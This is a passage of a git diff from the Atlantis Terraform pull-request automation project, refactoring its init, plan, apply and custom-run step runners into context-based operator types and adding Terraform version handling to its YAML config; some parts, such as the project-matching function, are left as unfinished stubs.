diff --git a/server/events/pull_request_operator.go b/server/events/pull_request_operator.go new file mode 100644 index 0000000000..61218e902f --- /dev/null +++ b/server/events/pull_request_operator.go @@ -0,0 +1,193 @@ +package events + +import ( + "os" + "path/filepath" + + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/vcs" + "github.com/runatlantis/atlantis/server/events/yaml" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + "github.com/runatlantis/atlantis/server/logging" +) + +type PullRequestOperator struct { + TerraformExecutor TerraformExec + DefaultTFVersion *version.Version + ParserValidator *yaml.ParserValidator + ProjectFinder ProjectFinder + VCSClient vcs.ClientProxy + Workspace AtlantisWorkspace + ProjectOperator ProjectOperator +} + +type TerraformExec interface { + RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) +} + +func (p *PullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse { + // check out repo to parse atlantis.yaml + // this will check out the repo to a * dir + repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) + if err != nil { + return CommandResponse{Error: err} + } + + // Parse config file if it exists. + config, err := p.ParserValidator.ReadConfig(repoDir) + if err != nil && !os.IsNotExist(err) { + return CommandResponse{Error: err} + } + noAtlantisYAML := os.IsNotExist(err) + + // We'll need the list of modified files. + modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull) + if err != nil { + return CommandResponse{Error: err} + } + + // Prepare the project contexts so the ProjectOperator can execute. + var projCtxs []models.ProjectCommandContext + + // If there is no config file, then we try to plan for each project that + // was modified in the pull request. 
+ if noAtlantisYAML { + modifiedProjects := p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, repoDir) + for _, mp := range modifiedProjects { + projCtxs = append(projCtxs, models.ProjectCommandContext{ + BaseRepo: ctx.BaseRepo, + HeadRepo: ctx.HeadRepo, + Pull: ctx.Pull, + User: ctx.User, + Log: ctx.Log, + RepoRelPath: mp.Path, + ProjectConfig: nil, + GlobalConfig: nil, + CommentArgs: nil, + Workspace: DefaultWorkspace, + }) + } + } else { + // Otherwise, we use the projects that match the WhenModified fields + // in the config file. + matchingProjects := p.matchingProjects(modifiedFiles, config) + for _, mp := range matchingProjects { + projCtxs = append(projCtxs, models.ProjectCommandContext{ + BaseRepo: ctx.BaseRepo, + HeadRepo: ctx.HeadRepo, + Pull: ctx.Pull, + User: ctx.User, + Log: ctx.Log, + CommentArgs: nil, + Workspace: mp.Workspace, + RepoRelPath: mp.Dir, + ProjectConfig: &mp, + GlobalConfig: &config, + }) + } + } + + // Execute the operations. + var results []ProjectResult + for _, pCtx := range projCtxs { + res := p.ProjectOperator.Plan(pCtx, nil) + res.Path = pCtx.RepoRelPath + res.Workspace = pCtx.Workspace + results = append(results, res) + } + return CommandResponse{ProjectResults: results} +} + +func (p *PullRequestOperator) PlanViaComment(ctx *CommandContext) CommandResponse { + repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) + if err != nil { + return CommandResponse{Error: err} + } + + var projCfg *valid.Project + var globalCfg *valid.Spec + + // Parse config file if it exists. 
+ config, err := p.ParserValidator.ReadConfig(repoDir) + if err != nil && !os.IsNotExist(err) { + return CommandResponse{Error: err} + } + if !os.IsNotExist(err) { + projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + globalCfg = &config + } + + projCtx := models.ProjectCommandContext{ + BaseRepo: ctx.BaseRepo, + HeadRepo: ctx.HeadRepo, + Pull: ctx.Pull, + User: ctx.User, + Log: ctx.Log, + CommentArgs: ctx.Command.Flags, + Workspace: ctx.Command.Workspace, + RepoRelPath: ctx.Command.Dir, + ProjectConfig: projCfg, + GlobalConfig: globalCfg, + } + projAbsPath := filepath.Join(repoDir, ctx.Command.Dir) + res := p.ProjectOperator.Plan(projCtx, &projAbsPath) + res.Workspace = projCtx.Workspace + res.Path = projCtx.RepoRelPath + return CommandResponse{ + ProjectResults: []ProjectResult{ + res, + }, + } +} + +func (p *PullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandResponse { + repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace) + if err != nil { + return CommandResponse{Failure: "No workspace found. Did you run plan?"} + } + + // todo: can deduplicate this between PlanViaComment + var projCfg *valid.Project + var globalCfg *valid.Spec + + // Parse config file if it exists. 
+ config, err := p.ParserValidator.ReadConfig(repoDir) + if err != nil && !os.IsNotExist(err) { + return CommandResponse{Error: err} + } + if !os.IsNotExist(err) { + projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + globalCfg = &config + } + + projCtx := models.ProjectCommandContext{ + BaseRepo: ctx.BaseRepo, + HeadRepo: ctx.HeadRepo, + Pull: ctx.Pull, + User: ctx.User, + Log: ctx.Log, + CommentArgs: ctx.Command.Flags, + Workspace: ctx.Command.Workspace, + RepoRelPath: ctx.Command.Dir, + ProjectConfig: projCfg, + GlobalConfig: globalCfg, + } + res := p.ProjectOperator.Apply(projCtx, filepath.Join(repoDir, ctx.Command.Dir)) + res.Workspace = projCtx.Workspace + res.Path = projCtx.RepoRelPath + return CommandResponse{ + ProjectResults: []ProjectResult{ + res, + }, + } +} + +// matchingProjects returns the list of projects whose WhenModified fields match +// any of the modifiedFiles. +func (p *PullRequestOperator) matchingProjects(modifiedFiles []string, config valid.Spec) []valid.Project { + //todo + // match the modified files against the config + // remember the modified_files paths are relative to the project paths + return nil +} diff --git a/server/events/execution_planner_test.go b/server/events/pull_request_operator_test.go similarity index 98% rename from server/events/execution_planner_test.go rename to server/events/pull_request_operator_test.go index 7b6fc7ac97..4bbdfd14b5 100644 --- a/server/events/execution_planner_test.go +++ b/server/events/pull_request_operator_test.go @@ -16,7 +16,7 @@ import ( func TestBuildStage_NoConfigFile(t *testing.T) { var defaultTFVersion *version.Version var terraformExecutor runtime.TerraformExec - e := events.ExecutionPlanner{ + e := events.PullRequestOperator{ DefaultTFVersion: defaultTFVersion, TerraformExecutor: terraformExecutor, } @@ -71,7 +71,7 @@ func TestBuildStage_NoConfigFile(t *testing.T) { func TestBuildStage(t *testing.T) { var defaultTFVersion *version.Version var terraformExecutor 
runtime.TerraformExec - e := events.ExecutionPlanner{ + e := events.PullRequestOperator{ DefaultTFVersion: defaultTFVersion, TerraformExecutor: terraformExecutor, } diff --git a/server/events/runtime/apply_step.go b/server/events/runtime/apply_step.go deleted file mode 100644 index 3591414815..0000000000 --- a/server/events/runtime/apply_step.go +++ /dev/null @@ -1,24 +0,0 @@ -package runtime - -import ( - "fmt" - "os" - "path/filepath" -) - -// ApplyStep runs `terraform apply`. -type ApplyStep struct { - ExtraArgs []string - Meta StepMeta -} - -func (a *ApplyStep) Run() (string, error) { - planPath := filepath.Join(a.Meta.AbsolutePath, a.Meta.Workspace+".tfplan") - stat, err := os.Stat(planPath) - if err != nil || stat.IsDir() { - return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", a.Meta.DirRelativeToRepoRoot, a.Meta.Workspace) - } - - tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, a.ExtraArgs...), a.Meta.ExtraCommentArgs...), planPath) - return a.Meta.TerraformExecutor.RunCommandWithVersion(a.Meta.Log, a.Meta.AbsolutePath, tfApplyCmd, a.Meta.TerraformVersion, a.Meta.Workspace) -} diff --git a/server/events/runtime/apply_step_operator.go b/server/events/runtime/apply_step_operator.go new file mode 100644 index 0000000000..819bcbf200 --- /dev/null +++ b/server/events/runtime/apply_step_operator.go @@ -0,0 +1,30 @@ +package runtime + +import ( + "fmt" + "os" + "path/filepath" + + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events/models" +) + +// ApplyStepOperator runs `terraform apply`. 
+type ApplyStepOperator struct { + TerraformExecutor TerraformExec +} + +func (a *ApplyStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { + planPath := filepath.Join(path, ctx.Workspace+".tfplan") + stat, err := os.Stat(planPath) + if err != nil || stat.IsDir() { + return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.RepoRelPath, ctx.Workspace) + } + + tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, extraArgs...), ctx.CommentArgs...), planPath) + var tfVersion *version.Version + if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { + tfVersion = ctx.ProjectConfig.TerraformVersion + } + return a.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, tfApplyCmd, tfVersion, ctx.Workspace) +} diff --git a/server/events/runtime/apply_step_test.go b/server/events/runtime/apply_step_operator_test.go similarity index 100% rename from server/events/runtime/apply_step_test.go rename to server/events/runtime/apply_step_operator_test.go diff --git a/server/events/runtime/approval_operator.go b/server/events/runtime/approval_operator.go new file mode 100644 index 0000000000..63731f3427 --- /dev/null +++ b/server/events/runtime/approval_operator.go @@ -0,0 +1,18 @@ +package runtime + +import ( + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/vcs" +) + +type ApprovalOperator struct { + VCSClient vcs.ClientProxy +} + +func (a *ApprovalOperator) IsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) { + approved, err := a.VCSClient.PullIsApproved(baseRepo, pull) + if err != nil { + return false, err + } + return approved, nil +} diff --git a/server/events/runtime/init_step.go b/server/events/runtime/init_step.go deleted file mode 100644 index 1bf5b8734d..0000000000 --- a/server/events/runtime/init_step.go +++ /dev/null @@ -1,20 +0,0 @@ -package runtime - -// InitStep runs `terraform 
init`. -type InitStep struct { - ExtraArgs []string - Meta StepMeta -} - -func (i *InitStep) Run() (string, error) { - // If we're running < 0.9 we have to use `terraform get` instead of `init`. - if MustConstraint("< 0.9.0").Check(i.Meta.TerraformVersion) { - i.Meta.Log.Info("running terraform version %s so will use `get` instead of `init`", i.Meta.TerraformVersion) - terraformGetCmd := append([]string{"get", "-no-color"}, i.ExtraArgs...) - _, err := i.Meta.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, terraformGetCmd, i.Meta.TerraformVersion, i.Meta.Workspace) - return "", err - } else { - _, err := i.Meta.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, append([]string{"init", "-no-color"}, i.ExtraArgs...), i.Meta.TerraformVersion, i.Meta.Workspace) - return "", err - } -} diff --git a/server/events/runtime/init_step_operator.go b/server/events/runtime/init_step_operator.go new file mode 100644 index 0000000000..307c91bcfe --- /dev/null +++ b/server/events/runtime/init_step_operator.go @@ -0,0 +1,29 @@ +package runtime + +import ( + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events/models" +) + +// InitStep runs `terraform init`. +type InitStepOperator struct { + TerraformExecutor TerraformExec + DefaultTFVersion *version.Version +} + +func (i *InitStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { + tfVersion := i.DefaultTFVersion + if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { + tfVersion = ctx.ProjectConfig.TerraformVersion + } + // If we're running < 0.9 we have to use `terraform get` instead of `init`. + if MustConstraint("< 0.9.0").Check(tfVersion) { + ctx.Log.Info("running terraform version %s so will use `get` instead of `init`", tfVersion) + terraformGetCmd := append([]string{"get", "-no-color"}, extraArgs...) 
+ _, err := i.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, terraformGetCmd, tfVersion, ctx.Workspace) + return "", err + } else { + _, err := i.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, append([]string{"init", "-no-color"}, extraArgs...), tfVersion, ctx.Workspace) + return "", err + } +} diff --git a/server/events/runtime/init_step_test.go b/server/events/runtime/init_step_operator_test.go similarity index 75% rename from server/events/runtime/init_step_test.go rename to server/events/runtime/init_step_operator_test.go index 911bcb2330..8296394977 100644 --- a/server/events/runtime/init_step_test.go +++ b/server/events/runtime/init_step_operator_test.go @@ -43,23 +43,17 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { tfVersion, _ := version.NewVersion(c.version) logger := logging.NewNoopLogger() - s := runtime.InitStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: "workspace", - AbsolutePath: "/path", - DirRelativeToRepoRoot: ".", - TerraformVersion: tfVersion, - TerraformExecutor: terraform, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + iso := runtime.InitStepOperator{ + TerraformExecutor: terraform, } - When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). ThenReturn("output", nil) - output, err := s.Run() + output, err := iso.Run(runtime.ProjectCommandContext{ + Log: logger, + Workspace: "workspace", + AbsPath: "/path", + RepoRelPath: ".", + }, []string{"extra", "args"}) Ok(t, err) // Shouldn't return output since we don't print init output to PR. 
Equals(t, "", output) diff --git a/server/events/runtime/plan_step.go b/server/events/runtime/plan_step_operater.go similarity index 54% rename from server/events/runtime/plan_step.go rename to server/events/runtime/plan_step_operater.go index b8d6b3acee..a7fd6793d0 100644 --- a/server/events/runtime/plan_step.go +++ b/server/events/runtime/plan_step_operater.go @@ -5,6 +5,9 @@ import ( "os" "path/filepath" "strings" + + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events/models" ) // atlantisUserTFVar is the name of the variable we execute terraform @@ -12,45 +15,48 @@ import ( const atlantisUserTFVar = "atlantis_user" const defaultWorkspace = "default" -// PlanStep runs `terraform plan`. -type PlanStep struct { - ExtraArgs []string - Meta StepMeta +type PlanStepOperator struct { + TerraformExecutor TerraformExec + DefaultTFVersion *version.Version } -func (p *PlanStep) Run() (string, error) { +func (p *PlanStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { + tfVersion := p.DefaultTFVersion + if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { + tfVersion = ctx.ProjectConfig.TerraformVersion + } + // We only need to switch workspaces in version 0.9.*. In older versions, // there is no such thing as a workspace so we don't need to do anything. - // In newer versions, the TF_WORKSPACE env var is respected and will handle - // using the right workspace and even creating it if it doesn't exist. - // This variable is set inside the Terraform executor. 
- if err := p.switchWorkspace(); err != nil { + if err := p.switchWorkspace(ctx, path, tfVersion); err != nil { return "", err } - planFile := filepath.Join(p.Meta.AbsolutePath, fmt.Sprintf("%s.tfplan", p.Meta.Workspace)) - userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, p.Meta.Username) - tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, p.ExtraArgs...), p.Meta.ExtraCommentArgs...) + planFile := filepath.Join(path, fmt.Sprintf("%s.tfplan", ctx.Workspace)) + userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username) + tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, extraArgs...), ctx.CommentArgs...) // Check if env/{workspace}.tfvars exist and include it. This is a use-case // from Hootsuite where Atlantis was first created so we're keeping this as // an homage and a favor so they don't need to refactor all their repos. // It's also a nice way to structure your repos to reduce duplication. - optionalEnvFile := filepath.Join(p.Meta.AbsolutePath, "env", p.Meta.Workspace+".tfvars") + optionalEnvFile := filepath.Join(path, "env", ctx.Workspace+".tfvars") if _, err := os.Stat(optionalEnvFile); err == nil { tfPlanCmd = append(tfPlanCmd, "-var-file", optionalEnvFile) } - return p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, filepath.Join(p.Meta.AbsolutePath), tfPlanCmd, p.Meta.TerraformVersion, p.Meta.Workspace) + return p.TerraformExecutor.RunCommandWithVersion(ctx.Log, filepath.Join(path), tfPlanCmd, tfVersion, ctx.Workspace) } // switchWorkspace changes the terraform workspace if necessary and will create // it if it doesn't exist. It handles differences between versions. -func (p *PlanStep) switchWorkspace() error { +func (p *PlanStepOperator) switchWorkspace(ctx models.ProjectCommandContext, path string, tfVersion *version.Version) error { // In versions less than 0.9 there is no support for workspaces. 
- noWorkspaceSupport := MustConstraint("<0.9").Check(p.Meta.TerraformVersion) - if noWorkspaceSupport && p.Meta.Workspace != defaultWorkspace { - return fmt.Errorf("terraform version %s does not support workspaces", p.Meta.TerraformVersion) + noWorkspaceSupport := MustConstraint("<0.9").Check(tfVersion) + // If the user tried to set a specific workspace in the comment but their + // version of TF doesn't support workspaces then error out. + if noWorkspaceSupport && ctx.Workspace != defaultWorkspace { + return fmt.Errorf("terraform version %s does not support workspaces", tfVersion) } if noWorkspaceSupport { return nil @@ -58,7 +64,7 @@ func (p *PlanStep) switchWorkspace() error { // In version 0.9.* the workspace command was called env. workspaceCmd := "workspace" - runningZeroPointNine := MustConstraint(">=0.9,<0.10").Check(p.Meta.TerraformVersion) + runningZeroPointNine := MustConstraint(">=0.9,<0.10").Check(tfVersion) if runningZeroPointNine { workspaceCmd = "env" } @@ -67,12 +73,12 @@ func (p *PlanStep) switchWorkspace() error { // already in the right workspace then no need to switch. This will save us // about ten seconds. This command is only available in > 0.10. if !runningZeroPointNine { - workspaceShowOutput, err := p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "show"}, p.Meta.TerraformVersion, p.Meta.Workspace) + workspaceShowOutput, err := p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "show"}, tfVersion, ctx.Workspace) if err != nil { return err } // If `show` says we're already on this workspace then we're done. - if strings.TrimSpace(workspaceShowOutput) == p.Meta.Workspace { + if strings.TrimSpace(workspaceShowOutput) == ctx.Workspace { return nil } } @@ -82,11 +88,11 @@ func (p *PlanStep) switchWorkspace() error { // we can create it if it doesn't. To do this we can either select and catch // the error or use list and then look for the workspace. 
Both commands take // the same amount of time so that's why we're running select here. - _, err := p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "select", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) + _, err := p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "select", "-no-color", ctx.Workspace}, tfVersion, ctx.Workspace) if err != nil { // If terraform workspace select fails we run terraform workspace // new to create a new workspace automatically. - _, err = p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "new", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) + _, err = p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "new", "-no-color", ctx.Workspace}, tfVersion, ctx.Workspace) return err } return nil diff --git a/server/events/runtime/plan_step_test.go b/server/events/runtime/plan_step_operater_test.go similarity index 100% rename from server/events/runtime/plan_step_test.go rename to server/events/runtime/plan_step_operater_test.go diff --git a/server/events/runtime/repoconfig.go b/server/events/runtime/repoconfig.go deleted file mode 100644 index 0880920fb5..0000000000 --- a/server/events/runtime/repoconfig.go +++ /dev/null @@ -1,93 +0,0 @@ -package runtime - -import ( - "github.com/hashicorp/go-version" - "github.com/runatlantis/atlantis/server/logging" -) - -type TerraformExec interface { - RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) -} - -type ApplyRequirement interface { - // IsMet returns true if the requirement is met and false if not. - // If it returns false, it also returns a string describing why not. 
- IsMet() (bool, string) -} - -type PlanStage struct { - Steps []Step - Workspace string - ProjectPath string -} - -type ApplyStage struct { - Steps []Step - ApplyRequirements []ApplyRequirement -} - -func (p PlanStage) Run() (string, error) { - var outputs string - for _, step := range p.Steps { - out, err := step.Run() - if err != nil { - return outputs, err - } - if out != "" { - // Outputs are separated by newlines. - outputs += "\n" + out - } - } - return outputs, nil -} - -func (a ApplyStage) Run() (string, error) { - var outputs string - for _, step := range a.Steps { - out, err := step.Run() - if err != nil { - return outputs, err - } - if out != "" { - // Outputs are separated by newlines. - outputs += "\n" + out - } - } - return outputs, nil -} - -type Step interface { - // Run runs the step. It returns any output that needs to be commented back - // onto the pull request and error. - Run() (string, error) -} - -// StepMeta is the data that is available to all steps. -type StepMeta struct { - Log *logging.SimpleLogger - Workspace string - // AbsolutePath is the path to this project on disk. It's not necessarily - // the repository root since a project can be in a subdir of the root. - AbsolutePath string - // DirRelativeToRepoRoot is the directory for this project relative - // to the repo root. - DirRelativeToRepoRoot string - TerraformVersion *version.Version - TerraformExecutor TerraformExec - // ExtraCommentArgs are the arguments that may have been appended to the comment. - // For example 'atlantis plan -- -target=resource'. They are already quoted - // further up the call tree to mitigate security issues. - ExtraCommentArgs []string - // VCS username of who caused this step to be executed. For example the - // commenter, or who pushed a new commit. - Username string -} - -// MustConstraint returns a constraint. It panics on error. 
-func MustConstraint(constraint string) version.Constraints { - c, err := version.NewConstraint(constraint) - if err != nil { - panic(err) - } - return c -} diff --git a/server/events/runtime/run_step.go b/server/events/runtime/run_step.go deleted file mode 100644 index ba6dbe3859..0000000000 --- a/server/events/runtime/run_step.go +++ /dev/null @@ -1,35 +0,0 @@ -package runtime - -import ( - "fmt" - "os/exec" - "strings" - - "github.com/pkg/errors" -) - -// RunStep runs custom commands. -type RunStep struct { - Commands []string - Meta StepMeta -} - -func (r *RunStep) Run() (string, error) { - if len(r.Commands) < 1 { - return "", errors.New("no commands for run step") - } - path := r.Meta.AbsolutePath - - cmd := exec.Command("sh", "-c", strings.Join(r.Commands, " ")) // #nosec - cmd.Dir = path - out, err := cmd.CombinedOutput() - - commandStr := strings.Join(r.Commands, " ") - if err != nil { - err = fmt.Errorf("%s: running %q in %q: \n%s", err, commandStr, path, out) - r.Meta.Log.Debug("error: %s", err) - return string(out), err - } - r.Meta.Log.Info("successfully ran %q in %q", commandStr, path) - return string(out), nil -} diff --git a/server/events/runtime/run_step_operator.go b/server/events/runtime/run_step_operator.go new file mode 100644 index 0000000000..6554527be6 --- /dev/null +++ b/server/events/runtime/run_step_operator.go @@ -0,0 +1,33 @@ +package runtime + +import ( + "fmt" + "os/exec" + "strings" + + "github.com/pkg/errors" + "github.com/runatlantis/atlantis/server/events/models" +) + +// RunStepOperator runs custom commands. 
+type RunStepOperator struct { +} + +func (r *RunStepOperator) Run(ctx models.ProjectCommandContext, command []string, path string) (string, error) { + if len(command) < 1 { + return "", errors.New("no commands for run step") + } + + cmd := exec.Command("sh", "-c", strings.Join(command, " ")) // #nosec + cmd.Dir = path + out, err := cmd.CombinedOutput() + + commandStr := strings.Join(command, " ") + if err != nil { + err = fmt.Errorf("%s: running %q in %q: \n%s", err, commandStr, path, out) + ctx.Log.Debug("error: %s", err) + return string(out), err + } + ctx.Log.Info("successfully ran %q in %q", commandStr, path) + return string(out), nil +} diff --git a/server/events/runtime/run_step_test.go b/server/events/runtime/run_step_operator_test.go similarity index 100% rename from server/events/runtime/run_step_test.go rename to server/events/runtime/run_step_operator_test.go diff --git a/server/events/runtime/runtime.go b/server/events/runtime/runtime.go index ea70550a68..8e599ff659 100644 --- a/server/events/runtime/runtime.go +++ b/server/events/runtime/runtime.go @@ -2,3 +2,21 @@ // based on configuration and defaults. The handlers can then execute this // graph. package runtime + +import ( + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/logging" +) + +type TerraformExec interface { + RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) +} + +// MustConstraint returns a constraint. It panics on error. 
+func MustConstraint(constraint string) version.Constraints { + c, err := version.NewConstraint(constraint) + if err != nil { + panic(err) + } + return c +} diff --git a/server/events/terraform/terraform_client.go b/server/events/terraform/terraform_client.go index a3508be724..55ed5d687e 100644 --- a/server/events/terraform/terraform_client.go +++ b/server/events/terraform/terraform_client.go @@ -87,14 +87,17 @@ func (c *DefaultClient) Version() *version.Version { } // RunCommandWithVersion executes the provided version of terraform with -// the provided args in path. v is the version of terraform executable to use -// and workspace is the workspace specified by the user commenting -// "atlantis plan/apply {workspace}" which is set to "default" by default. +// the provided args in path. v is the version of terraform executable to use. +// If v is nil, will use the default version. +// Workspace is the terraform workspace to run in. We won't switch workspaces +// but will set the TERRAFORM_WORKSPACE environment variable. func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) { tfExecutable := "terraform" + tfVersionStr := c.defaultVersion.String() // if version is the same as the default, don't need to prepend the version name to the executable - if !v.Equal(c.defaultVersion) { + if v != nil && !v.Equal(c.defaultVersion) { tfExecutable = fmt.Sprintf("%s%s", tfExecutable, v.String()) + tfVersionStr = v.String() } // set environment variables @@ -115,7 +118,7 @@ func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path st // because it's probably safer for users to rely on it. Terraform might // change the way TF_WORKSPACE works in the future. 
fmt.Sprintf("WORKSPACE=%s", workspace), - fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", v.String()), + fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", tfVersionStr), fmt.Sprintf("DIR=%s", path), } envVars = append(envVars, os.Environ()...) diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go index be9ce1980b..3273cb38a1 100644 --- a/server/events/yaml/raw/project.go +++ b/server/events/yaml/raw/project.go @@ -6,6 +6,7 @@ import ( "strings" "github.com/go-ozzo/ozzo-validation" + "github.com/hashicorp/go-version" "github.com/runatlantis/atlantis/server/events/yaml/valid" ) @@ -39,9 +40,17 @@ func (p Project) Validate() error { } return nil } + validTFVersion := func(value interface{}) error { + // Safe to dereference because this is only called if the pointer is + // not nil. + versionStr := *value.(*string) + _, err := version.NewVersion(versionStr) + return err + } return validation.ValidateStruct(&p, validation.Field(&p.Dir, validation.Required, validation.By(hasDotDot)), validation.Field(&p.ApplyRequirements, validation.By(validApplyReq)), + validation.Field(&p.TerraformVersion, validation.By(validTFVersion)), ) } @@ -56,7 +65,9 @@ func (p Project) ToValid() valid.Project { } v.Workflow = p.Workflow - v.TerraformVersion = p.TerraformVersion + if p.TerraformVersion != nil { + v.TerraformVersion, _ = version.NewVersion(*p.TerraformVersion) + } if p.Autoplan == nil { v.Autoplan = DefaultAutoPlan() } else { diff --git a/server/events/yaml/valid/valid.go b/server/events/yaml/valid/valid.go index 75d79a3d93..0a7ef2e972 100644 --- a/server/events/yaml/valid/valid.go +++ b/server/events/yaml/valid/valid.go @@ -1,5 +1,7 @@ package valid +import "github.com/hashicorp/go-version" + // Spec is the atlantis yaml spec after it's been parsed and validated. // The raw.Spec is transformed into the ValidSpec which is then used by the // rest of Atlantis. 
@@ -11,11 +13,38 @@ type Spec struct { Workflows map[string]Workflow } +func (s Spec) GetPlanStage(workflowName string) *Stage { + for name, flow := range s.Workflows { + if name == workflowName { + return flow.Plan + } + } + return nil +} + +func (s Spec) GetApplyStage(workflowName string) *Stage { + for name, flow := range s.Workflows { + if name == workflowName { + return flow.Apply + } + } + return nil +} + +func (s Spec) FindProject(dir string, workspace string) *Project { + for _, p := range s.Projects { + if p.Dir == dir && p.Workspace == workspace { + return &p + } + } + return nil +} + type Project struct { Dir string Workspace string Workflow *string - TerraformVersion *string + TerraformVersion *version.Version Autoplan Autoplan ApplyRequirements []string } diff --git a/server/server.go b/server/server.go index 368553a0ea..fe6e3f7b5f 100644 --- a/server/server.go +++ b/server/server.go @@ -36,7 +36,7 @@ import ( "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/locking/boltdb" "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/run" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" @@ -188,23 +188,12 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { return nil, err } lockingClient := locking.NewClient(boltdb) - run := &run.Run{} - configReader := &events.ProjectConfigManager{} workspaceLocker := events.NewDefaultAtlantisWorkspaceLocker() workspace := &events.FileWorkspace{ DataDir: userConfig.DataDir, } projectLocker := &events.DefaultProjectLocker{ - Locker: lockingClient, - Run: run, - ConfigReader: configReader, - Terraform: terraformClient, - } - executionPlanner := &events.ExecutionPlanner{ - ParserValidator: &yaml.ParserValidator{}, - 
DefaultTFVersion: terraformClient.Version(), - TerraformExecutor: terraformClient, - ProjectFinder: &events.DefaultProjectFinder{}, + Locker: lockingClient, } underlyingRouter := mux.NewRouter() router := &Router{ @@ -213,27 +202,6 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { LockViewRouteName: LockViewRouteName, Underlying: underlyingRouter, } - applyExecutor := &events.ApplyExecutor{ - VCSClient: vcsClient, - Terraform: terraformClient, - RequireApproval: userConfig.RequireApproval, - Run: run, - AtlantisWorkspace: workspace, - ProjectLocker: projectLocker, - ExecutionPlanner: executionPlanner, - Webhooks: webhooksManager, - } - planExecutor := &events.PlanExecutor{ - VCSClient: vcsClient, - Terraform: terraformClient, - Run: run, - Workspace: workspace, - ProjectLocker: projectLocker, - Locker: lockingClient, - ProjectFinder: &events.DefaultProjectFinder{}, - ExecutionPlanner: executionPlanner, - LockURLGenerator: router, - } pullClosedExecutor := &events.PullClosedExecutor{ VCSClient: vcsClient, Locker: lockingClient, @@ -252,9 +220,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { GitlabUser: userConfig.GitlabUser, GitlabToken: userConfig.GitlabToken, } + defaultTfVersion := terraformClient.Version() commandHandler := &events.CommandHandler{ - ApplyExecutor: applyExecutor, - PlanExecutor: planExecutor, 